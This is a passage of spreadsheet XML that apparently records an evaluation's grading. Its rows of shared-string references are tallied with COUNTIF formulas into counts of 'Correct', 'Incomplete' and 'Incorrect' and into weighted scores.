      </c>
      <c r="E22" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>222</v>
      </c>
      <c r="G22" s="3"/>
    </row>
    <row r="23" spans="1:7" ht="409.6" x14ac:dyDescent="0.3">
      <c r="A23" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D23" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>224</v>
      </c>
      <c r="G23" s="3"/>
    </row>
    <row r="24" spans="1:7" ht="374.4" x14ac:dyDescent="0.3">
      <c r="A24" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D24" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E24" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>225</v>
      </c>
      <c r="G24" s="3"/>
    </row>
    <row r="25" spans="1:7" ht="345.6" x14ac:dyDescent="0.3">
      <c r="A25" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D25" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E25" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>226</v>
      </c>
      <c r="G25" s="3"/>
    </row>
    <row r="26" spans="1:7" ht="288" x14ac:dyDescent="0.3">
      <c r="A26" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D26" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E26" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>227</v>
      </c>
      <c r="G26" s="3"/>
    </row>
    <row r="27" spans="1:7" ht="388.8" x14ac:dyDescent="0.3">
      <c r="A27" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C27" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D27" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E27" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>228</v>
      </c>
      <c r="G27" s="3"/>
    </row>
    <row r="28" spans="1:7" ht="409.6" x14ac:dyDescent="0.3">
      <c r="A28" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C28" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D28" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E28" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>229</v>
      </c>
      <c r="G28" s="3"/>
    </row>
    <row r="29" spans="1:7" ht="360" x14ac:dyDescent="0.3">
      <c r="A29" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C29" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D29" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E29" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>230</v>
      </c>
      <c r="G29" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C29">
    <cfRule type="cellIs" dxfId="2" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="0" priority="3" operator="equal">
      <formula>"Incorrect"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6"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="I2" sqref="I2:I26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="35" customWidth="1"/>
    <col min="2" max="13" width="20" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D1" s="1" t="s">
        <v>17</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>21</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>25</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>29</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>33</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>231</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>232</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="L1" s="1" t="s">
        <v>233</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>234</v>
      </c>
    </row>
    <row r="2" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>7</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="F2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="G2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="H2" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I2" s="2">
        <f t="shared" ref="I2:I26" si="0">COUNTIF(B2:H2,"Correct")*2 + COUNTIF(B2:H2,"Incomplete")*1</f>
        <v>0</v>
      </c>
      <c r="J2" s="4">
        <f t="shared" ref="J2:J26" si="1">IF((K2+L2+M2)&gt;0, K2/(K2+L2+M2), 0)</f>
        <v>0</v>
      </c>
      <c r="K2" s="2">
        <f t="shared" ref="K2:K26" si="2">COUNTIF(B2:H2, "Correct")</f>
        <v>0</v>
      </c>
      <c r="L2" s="2">
        <f t="shared" ref="L2:L26" si="3">COUNTIF(B2:H2, "Incomplete")</f>
        <v>0</v>
      </c>
      <c r="M2" s="2">
        <f t="shared" ref="M2:M26" si="4">COUNTIF(B2:H2, "Incorrect")</f>
        <v>7</v>
      </c>
    </row>
    <row r="3" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>37</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>233</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>234</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G3" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I3" s="2">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="J3" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K3" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L3" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M3" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>45</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>233</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G4" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H4" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I4" s="2">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J4" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K4" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L4" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M4" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="5" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>53</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G5" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I5" s="2">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="J5" s="4">
        <f t="shared" si="1"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K5" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="L5" s="2">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M5" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>233</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H6" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I6" s="2">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="J6" s="4">
        <f t="shared" si="1"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K6" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="L6" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M6" s="2">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="7" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>69</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I7" s="2">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="J7" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K7" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L7" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M7" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>233</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I8" s="2">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="J8" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K8" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L8" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M8" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A9" s="2" t="s">
        <v>85</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>233</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D9" s="3" t="s">
        <v>233</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>234</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>233</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H9" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I9" s="2">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
      <c r="J9" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K9" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L9" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M9" s="2">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="10" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A10" s="2" t="s">
        <v>93</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D10" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G10" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I10" s="2">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="J10" s="4">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K10" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="L10" s="2">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M10" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A11" s="2" t="s">
        <v>101</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>233</v>
      </c>
      <c r="G11" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H11" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I11" s="2">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="J11" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K11" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L11" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M11" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A12" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D12" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>234</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G12" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H12" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I12" s="2">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="J12" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K12" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L12" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M12" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A13" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>233</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H13" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I13" s="2">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="J13" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K13" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L13" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M13" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A14" s="2" t="s">
        <v>109</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>233</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G14" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H14" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I14" s="2">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="J14" s="4">
        <f t="shared" si="1"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K14" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="L14" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M14" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>233</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H15" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I15" s="2">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="J15" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K15" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L15" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M15" s="2">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
    </row>
    <row r="16" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A16" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D16" s="3" t="s">
        <v>233</v>
      </c>
      <c r="E16" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G16" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H16" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I16" s="2">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
      <c r="J16" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K16" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L16" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M16" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A17" s="2" t="s">
        <v>159</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E17" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G17" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H17" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I17" s="2">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="J17" s="4">
        <f t="shared" si="1"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K17" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="L17" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M17" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A18" s="2" t="s">
        <v>151</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D18" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E18" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G18" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H18" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I18" s="2">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="J18" s="4">
        <f t="shared" si="1"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K18" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="L18" s="2">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="M18" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A19" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D19" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E19" s="3" t="s">
        <v>234</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G19" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H19" s="2" t="s">
        <v>234</v>
      </c>
      <c r="I19" s="2">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="J19" s="4">
        <f t="shared" si="1"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K19" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L19" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M19" s="2">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="20" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A20" s="2" t="s">
        <v>175</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D20" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E20" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G20" s="3" t="s">
        <v>234</v>
      </c>
      <c r="H20" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I20" s="2">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="J20" s="4">
        <f t="shared" si="1"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K20" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="L20" s="2">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M20" s="2">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
    </row>
    <row r="21" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A21" s="2" t="s">
        <v>183</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D21" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E21" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H21" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I21" s="2">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="J21" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K21" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L21" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M21" s="2">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="22" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A22" s="2" t="s">
        <v>191</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D22" s="3" t="s">
        <v>9</v>
      </c>
      <c r="E22" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G22" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H22" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I22" s="2">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="J22" s="4">
        <f t="shared" si="1"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K22" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="L22" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M22" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A23" s="2" t="s">
        <v>199</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D23" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E23" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>234</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>233</v>
      </c>
      <c r="H23" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I23" s="2">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="J23" s="4">
        <f t="shared" si="1"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K23" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="L23" s="2">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="M23" s="2">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
    </row>
    <row r="24" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A24" s="2" t="s">
        <v>207</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D24" s="3" t="s">
        <v>234</v>
      </c>
      <c r="E24" s="3" t="s">
        <v>233</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G24" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H24" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I24" s="2">
        <f t="shared" si="0"/>
        <v>11</v>
      </c>
      <c r="J24" s="4">
        <f t="shared" si="1"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K24" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="L24" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M24" s="2">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A25" s="2" t="s">
        <v>215</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D25" s="3" t="s">
        <v>233</v>
      </c>
      <c r="E25" s="3" t="s">
        <v>9</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>9</v>
      </c>
      <c r="G25" s="3" t="s">
        <v>9</v>
      </c>
      <c r="H25" s="2" t="s">
        <v>9</v>
      </c>
      <c r="I25" s="2">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="J25" s="4">
        <f t="shared" si="1"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K25" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="L25" s="2">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="M25" s="2">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:13" x14ac:dyDescent="0.3">
      <c r="A26" s="2" t="s">
        <v>223</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>9</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D26" s="2" t="s">
        <v>9</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>9</v>
      </c>
      <c r="F26" s="2" t="s">
        <v>9</v>
      </c>
